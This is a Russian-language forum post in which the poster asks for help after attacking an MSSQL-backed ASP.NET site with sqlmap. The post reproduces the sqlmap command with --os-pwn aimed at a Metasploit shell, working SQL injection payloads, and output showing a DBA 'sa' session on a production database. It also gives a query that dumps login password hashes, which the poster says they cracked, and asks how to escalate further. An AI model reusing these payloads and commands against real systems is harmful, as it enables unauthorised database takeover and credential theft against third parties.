mssql
Добрый день прошу совета может кто сталкивался
Есть рес в sqlmap добрался до хешей рассшифровал пробовал лить шелл через метасплоит но выдает unable to prompt for an out-of-band session bug report
sqlmap -u "http://******/" --data="password=g00dPa%24%24w0rD&username=" -p username --os-pwn --msf-path C:\PentestBox\bin\metasploit-framework -v 1
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: password=g00dPa$$w0rD&username=-5537' OR 9211=9211-- VoeH
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
Payload: password=g00dPa$$w0rD&username=-5326' OR 1910 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE WHEN (1910=1910) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(120)+CHAR (113)))-- fjCa
---
[19:51:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016
web application technology: ASP.NET, Microsoft IIS 10.0, ASP
back-end DBMS: Microsoft SQL Server 2012
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[19:51:56] [CRITICAL] unable to prompt for an out-of-band session
banner:
---
Microsoft SQL Server 2014 (SP2-GDR) (KB4019093) - 12.0.5207.0 (X64)
Jul 3 2017 02:25:44
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)
current user: 'sa'
current database: 'PW_PROD'
current user is DBA: True
На mysql знаю команда --users --passwords --privileges выводит юзеров,пароль и привилегии
в mssql вывел юзеров и пароли такой командой
select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins
--is-dba пишет True
команда --privileges выводит просто всех юзеров
database management system users privileges:[*] ##MS_AgentSigningCertificate##[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicySigningCertificate##[*] ##MS_PolicyTsqlExecutionLogin##[*] ##MS_SmoExtendedSigningCertificate##[*] ##MS_SQLAuthenticatorCertificate##[*] ##MS_SQLReplicationSigningCertificate##[*] ##MS_SQLResourceSigningCertificate##[*] bwuser[*] sa (administrator)
как посмотреть какие конкретные привилегии есть у юзеров?
|